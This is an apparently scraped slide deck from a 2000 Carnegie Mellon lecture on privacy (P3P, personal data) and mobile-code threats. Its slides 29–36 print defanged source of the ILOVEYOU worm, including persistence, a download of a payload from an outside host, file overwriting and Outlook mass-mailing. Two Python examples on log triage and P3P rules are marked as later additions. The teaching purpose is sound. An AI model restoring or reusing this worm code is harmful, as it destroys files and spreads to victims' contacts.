Published by Jade Lyons. Modified over 9 years ago.
2
Lecture 4, 20-771: Computer Security, Fall 2000
20-771: Computer Security
Lecture 4: Active Content & Privacy 1
Robert Thibadeau
School of Computer Science, Carnegie Mellon University
Institute for eCommerce, Fall 2000
3
Today’s lecture
Privacy I
Break (10 min)
Active Content
Quiz
4
This Week
Chapters 3,4,5 WS
Homework
Quiz Today
5
X.509v3 Certificate
6
X.509v3 Opened!
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Certificate Authority, CN=Snake Oil CA/Email=ca@snakeoil.dom
        Validity
            Not Before: Oct 21 18:21:51 1999 GMT
            Not After : Oct 20 18:21:51 2001 GMT
        Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Webserver Team, CN=www.snakeoil.dom/Email=www@snakeoil.dom
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
7
509 Opened 2
KEY :
Exponent: 65537 (0x10001)
X509v3 extensions:
    X509v3 Subject Alternative Name:
        email:www@snakeoil.dom
    Netscape Comment:
        mod_ssl generated custom server certificate
    Netscape Cert Type:
        SSL Server
Signature Algorithm: md5WithRSAEncryption
8
Privacy: Introduction
Privacy does not have the honor of having an accepted technical meaning
– PII: Personally Identifiable Information
– Privacy as insuring against the misuse of information
– Assuring that data is hidden
Interesting Government Policy Documents
– http://www.whitehouse.gov/WH/New/Commerce/read.html
– http://www.whitehouse.gov/WH/New/html/20000501_4.html
Sky is falling syndrome:
– http://www.privacylaw.net/ .. among many others
9
The Simple Cases
Keep it completely secret so privacy is assured. (Cryptophilia)
Make it completely public so privacy is not a problem. (Jeffersonism)
Personally Identifiable Information, PII, (your name, address, and credit card number) is all that needs to be protected. (CreditCarditis)
Not good enough. Need to tell some things to some people but don’t want those things misused.
10
Sky is falling Syndrome
Considering history, FBI e-mail snooping raises red flag
Five biggest threats to online privacy
Privacy Group Wants Speedier Carnivore Disclosure
FBI To Release E-mail Documents
Verizon Site Exposed Customer Data
Nosy Bosses Face Limits on E-Mail Spying -- Workers Gain New Freedoms
11
Sky is Falling
Those guys are bad guys that are taking advantage of anything I disclose and anything they can find out.
Doubleclick and cookies
– Cookie is employed to keep track of sites you visit.
– Still, ongoing. Very hard to defeat as a practical matter.
– Very hard not to visit a place.
– Bypasses proxy services.
12
Silent Information Thieves!
Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)
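An added example, not part of the original lecture: one way to triage entries in the `daemon[pid]: connect from host` format of this access log, flagging sources that touch several services within seconds, get refused, or fail the name/address check. The sample lines are constructed, the host `loghost` and all addresses are placeholders, and the 5-second window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines (not taken from the slide). Sources use
# documentation-only addresses and names; "loghost" is a placeholder host.
SAMPLE_LOG = """\
May  9 03:23:05 loghost ftpd[2184]: refused connect from 192.0.2.10
May 16 19:46:24 loghost telnetd[5775]: connect from 198.51.100.4
May 16 19:46:24 loghost ftpd[5776]: connect from 198.51.100.4
May 16 19:46:25 loghost telnetd[5777]: connect from 198.51.100.4
May 23 07:06:29 loghost telnetd[9035]: connect from lab.example.net
Sep 13 11:07:01 loghost telnetd[23665]: host name/address mismatch: 203.0.113.7 != mail.example.net
Sep 13 11:07:01 loghost telnetd[23665]: refused connect from 203.0.113.7
Sep 13 11:07:20 loghost ftpd[23666]: refused connect from 203.0.113.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\s(?P<svc>\w+)\[\d+\]:\s(?P<msg>.*)$")
CONNECT_RE = re.compile(r"^(?P<refused>refused )?connect from (?P<src>\S+)$")
MISMATCH_RE = re.compile(r"^host name/address mismatch: (?P<src>\S+) != \S+$")


def parse(text, year=2000):
    """Yield (timestamp, service, kind, source) for each recognised line.

    Syslog timestamps carry no year, so one is supplied (assumption: 2000).
    """
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        stamp = " ".join(m["ts"].split())          # collapse "May  9" padding
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        conn = CONNECT_RE.match(m["msg"])
        mism = MISMATCH_RE.match(m["msg"])
        if conn:
            kind = "refused" if conn["refused"] else "connect"
            yield ts, m["svc"], kind, conn["src"]
        elif mism:
            yield ts, m["svc"], "mismatch", mism["src"]


def summarize(events, window=timedelta(seconds=5)):
    """Group events by source and compute the three findings per source."""
    by_src = defaultdict(list)
    for ts, svc, kind, src in events:
        by_src[src].append((ts, svc, kind))
    report = {}
    for src, evs in by_src.items():
        evs.sort()
        # Two different daemons contacted within `window` looks like a sweep.
        sweep = any(a[1] != b[1] and b[0] - a[0] <= window
                    for i, a in enumerate(evs) for b in evs[i + 1:])
        report[src] = {
            "events": len(evs),
            "services": sorted({svc for _, svc, _ in evs}),
            "multi_service_sweep": sweep,
            "refused": sum(kind == "refused" for _, _, kind in evs),
            "dns_mismatch": any(kind == "mismatch" for _, _, kind in evs),
        }
    return report


def suspicious(report):
    """Sources with at least one finding, sorted for stable output."""
    return sorted(src for src, r in report.items()
                  if r["multi_service_sweep"] or r["refused"] or r["dns_mismatch"])


if __name__ == "__main__":
    for src in suspicious(summarize(parse(SAMPLE_LOG))):
        print(src)
```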
13
An Unsolvable Problem?
Privacy is clearly out of control on the Internet
There is theft of information all over the place, all the time.
The controls are not disclosed and would be ridiculous if examined carefully.
Privacy Policies are ridiculous since they are one-way ultimatums trying to be “reasonable”
Restricting privacy to considering your name and address is ridiculous because there are lots of ways to identify you.
Personally Identifiable Information is ridiculous because that cannot be specified perfectly.
14
Authorization
Limit actions to those that are authorized to take those actions.
– This seems OK since they can be held responsible for this.
Limit use of information to those that are authorized to use it.
– Protects privacy if there is an “understanding” not to misuse.
– Do you believe this?
15
Privacy
It is not an information problem
– PII protection is ill-defined
It is a problem with the use of information
– Information misuse is the problem
– Information misuse is ill-defined
It makes more sense to address the ill-defined, but vastly more pervasive and appropriate, problem of information misuse than the ill-defined problem of personally identifiable information.
16
Privacy Modelled after the Non-Disclosure Agreement
What is going to be disclosed.
For what purpose.
Both parties agree to what information is disclosed
Both parties agree to what use this information is put
17
Privacy Requires
Legally binding default agreements
– Like Copyright or other Law (You can’t read somebody else’s mail).
Agreements on what information is disclosed and what use the information is put.
– Agreement is two sided.
– It is not reasonable to assume that a one-sided agreement preserves privacy.
18
www.w3.org/p3p
Platform for Privacy Preferences
The legal entity making the representation.
The site provides access to various kinds of information.
Data practices applied to data.
Types of data that a site collects
Intended uses of the data.
Purpose of data collection or purpose of uses of data.
Retention policy on data.
Dispute Resolution procedures (e.g., third party, customer support).
Remedy (e.g., cash payment)
Explanation about why the suggested practice may be valuable in a particular instance even if the user would not normally allow the practice.
19
Nature of P3P “Agreement”
Client goes to Server
Server issues ultimatum about Privacy Policy
Client can either accept or leave.
Methods exist for notifying User that a Privacy Policy is in violation of his Privacy Preferences, so as to allow User to change his mind.
– APPEL: Rules that say, ACCEPT, REJECT, INFORM, WARN (user).
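An added example, not part of the original lecture: a simplified model of a user agent checking a site's policy against ordered preference rules that yield the four outcomes named on the slide. The dictionaries stand in for the W3C XML syntax, and every vocabulary value, the site name `shop.example`, the fail-closed default and the outcome-to-action mapping in `decide` are assumptions of this sketch.

```python
# Simplified stand-in for a P3P policy and an APPEL rule set: plain dicts,
# not the W3C XML syntax. All values below are constructed for illustration.
BEHAVIORS = ("ACCEPT", "REJECT", "INFORM", "WARN")   # outcomes named on the slide

SITE_POLICY = {
    "entity": "shop.example",
    "statements": [
        {"data": {"name", "postal-address"}, "purposes": {"order-fulfilment"},
         "recipients": {"ours"}, "retention": "stated-purpose"},
        {"data": {"clickstream"}, "purposes": {"marketing"},
         "recipients": {"ours", "third-party"}, "retention": "indefinite"},
    ],
    "disputes": "customer-support",
    "remedy": None,
}

USER_RULES = [   # evaluated in order; the first rule that matches decides
    {"behavior": "REJECT", "when": {"recipients": {"public"}}},
    {"behavior": "WARN",
     "when": {"purposes": {"marketing"}, "recipients": {"third-party"}}},
    {"behavior": "INFORM", "when": {"retention": {"indefinite"}}},
    {"behavior": "ACCEPT", "when": {}},               # catch-all
]


def _values(stmt, field):
    """Return a statement field as a set, whether stored as a set or a scalar."""
    value = stmt.get(field, set())
    return value if isinstance(value, (set, frozenset)) else {value}


def statement_matches(stmt, when):
    """True if, for every field in `when`, the statement has a listed value."""
    return all(_values(stmt, field) & wanted for field, wanted in when.items())


def evaluate(policy, rules):
    """Return (behavior, rule index, matching statement) for the first hit."""
    for idx, rule in enumerate(rules):
        if rule["behavior"] not in BEHAVIORS:
            raise ValueError(f"unknown behavior in rule {idx}")
        for stmt in policy["statements"]:
            if statement_matches(stmt, rule["when"]):
                return rule["behavior"], idx, stmt
    return "REJECT", None, None    # nothing fired: fail closed (assumption)


def decide(policy, rules, user_confirms=lambda behavior, stmt: False):
    """Map the outcome to the only two moves the client has: proceed or leave.

    There is no branch that sends a counter-policy back to the server.
    """
    behavior, _, stmt = evaluate(policy, rules)
    if behavior in ("ACCEPT", "INFORM"):
        return "proceed"
    if behavior == "WARN" and user_confirms(behavior, stmt):
        return "proceed"
    return "leave"


if __name__ == "__main__":
    print(evaluate(SITE_POLICY, USER_RULES)[:2], decide(SITE_POLICY, USER_RULES))
```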
20
P3P Agreement is NOT an Agreement
It can be repudiated (I didn’t see that, my browser wasn’t working)
There is no confirmation between the two parties of an agreement. The server must simply assume the user has agreed.
User has no opportunity to pose a different privacy policy to server.
User is not bound by any agreement not to disclose or misuse.
Alternative means of passing information not covered (e.g., email?) – no explicit scope.
21
Two Sides
Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)
Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.
BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)
An Agreement is bilateral.
The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.
22
More Rational Privacy Scenario
TRUSTe violates privacy agreement and uses cookies to track personally identifiable information.
Reporter violates privacy agreement and reports publicly on TRUSTe violation without first contacting the TRUSTe webmaster.
Now we are talking trust!
23
Next: Active Content
Think about the world if Active Content had privacy agreements around it.
24
Break!
25
Active Content
Also called “Mobile Code”
Web Browsers can download and execute software automatically without warning.
Software may damage user’s system or violate privacy.
Administrator: This can tunnel through firewall protections.
Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.
Failed: This would “dumb down” Federal employees and make the Government Stupid.
26
Threats from Mobile Code
Purposefully malicious
– Moldovan Connection
» Sexygirls.com and Erotic2000.com
» Downloaded and ran viewer; program hung up phone and made long distance call to Moldova, $2 per minute.
» User taken to site stayed around without knowing charge.
– “I Love You” Worm: probable accidental escape.
Big programs have bugs
– Other people will exploit those bugs
27
Traditional Threats
Trojan Horses: Very Serious. Often used for spying. (e.g., change the login program to create a back door).
Virus: Code that replicates itself and inserts into an executable program or file.
Macro viruses: Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.
Rabbits: Programs that make many copies of themselves. Standalone. Denial of Service.
Worms: Similar but spread across network.
28
Many Many Threats
I Love You
– Opening email that says “I Love You” from a person you know: Trojan Horse
– Reads your address book: Privacy Violation
– Deletes image files: Havoc
– Across Network: Worm
Demonstrated
– Microsoft Outlook could execute seriously destructive and intrusive active content without control of user.
29
I Love You Code (virus has been killed)
had name ‘vxryfunny.vbs’
rxm barok -lovxlxttxr(vbx) <i hatx go to school>
rxmby: spydxr / ispydxr@mail.com / @GRAMMxRSoft Group / Manila,Philippinxs
dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")
sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)
vbscopy=filx.RxadAll
30
I Love You Code 2
main()
sxt wscr=CrxatxObj("WScript.Shxll")
rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"
Sxt dirwin = fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)
Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm&"\MSKxrnxl32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystxm&"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()
31
I Love You Code 3: rxgruns()
sub rxgruns()
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"
Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Download Dirory")
rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"
xnd sub
32
I Love You Code 4
Listing the Drives on Your Machine (there were several of these utility-type spies)
sub listadriv
Dim d,dc,s
Sxt dc = fso.Drivxs
For xach d in dc
If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn
foldxrlist(d.path&"\")
xnd if
Nxxt
listadriv = s
xnd sub
33
I Love You Code 5
re-writing jpg files
sub inffilxs(foldxrspxc)
sxt f = fso.GxtFoldxr(foldxrspxc)
sxt fc = f.Filxs
for xach f1 in fc
xxt=fso.GxtxxtxnsionNamx(f1.path)
if (xxt="vbs") or (xxt="vbx") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt="jpg") or (xxt="jpxg") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
(did same for mp3 files and others)
34
I Love You Code 6: .ini
if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"
scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub
36
I Love You Code 8: spread mail
sub sprxadtoxmail()
sxt rxgxdit=CrxatxObj("WScript.Shxll")
sxt out=WScript.CrxatxObj("Outlook.Application")
sxt mapi=out.GxtNamxSpacx("MAPI")
for ctrlists=1 to mapi.AddrxssLists.Count
sxt a=mapi.AddrxssLists(ctrlists)
rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)
if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
for ctrxntrixs=1 to a.Addrxssxntrixs.Count
malxad=a.Addrxssxntrixs(x)
rxgad=""
rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)
if (rxgad="") thxn
sxt malx=out.CrxatxItxm(0)
malx.Rxcipixnts.Add(malxad)
malx.Subj = "fwd: Jokx"
malx.Body = vbcrlf&""
malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
malx.Sxnd
Sxt out=Nothing
Sxt mapi=Nothing
xnd sub
37
Silent Attacks
It should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine).
We can do this with your web browser too …
38
Virus Checkers
Pattern match in secret ways to find viral “fingerprints”
Use a technique called “finite state automata” to create very fast search over your files.
If virus is not known already, it will do damage.
Finding silent viruses may be hard.
39
Authenticode System
Windows 2000
Running code requires an X.509v3 Certificate with an approved CA
Personal Publishers (ID with Credit Bureau)
Commercial Publishers (Articles of Incorporation)
Sign a pledge: “reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other data that may damage, misappropriate, or otherwise interfere with a third party’s operations.”
Remedy: Revoke your Certificate (HA!)
40
Steps you can Take
Don’t run as administrator/root
Use Virus Checkers (but watch those companies!!!)
Backup Often
Verify the integrity and authenticity of software.
– A very good idea is to not accept active code without a certificate that guarantees the author can be found!
– Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.
41
Finally,
Even if Adobe is the authentic code writer/distributor, get them to agree to your privacy!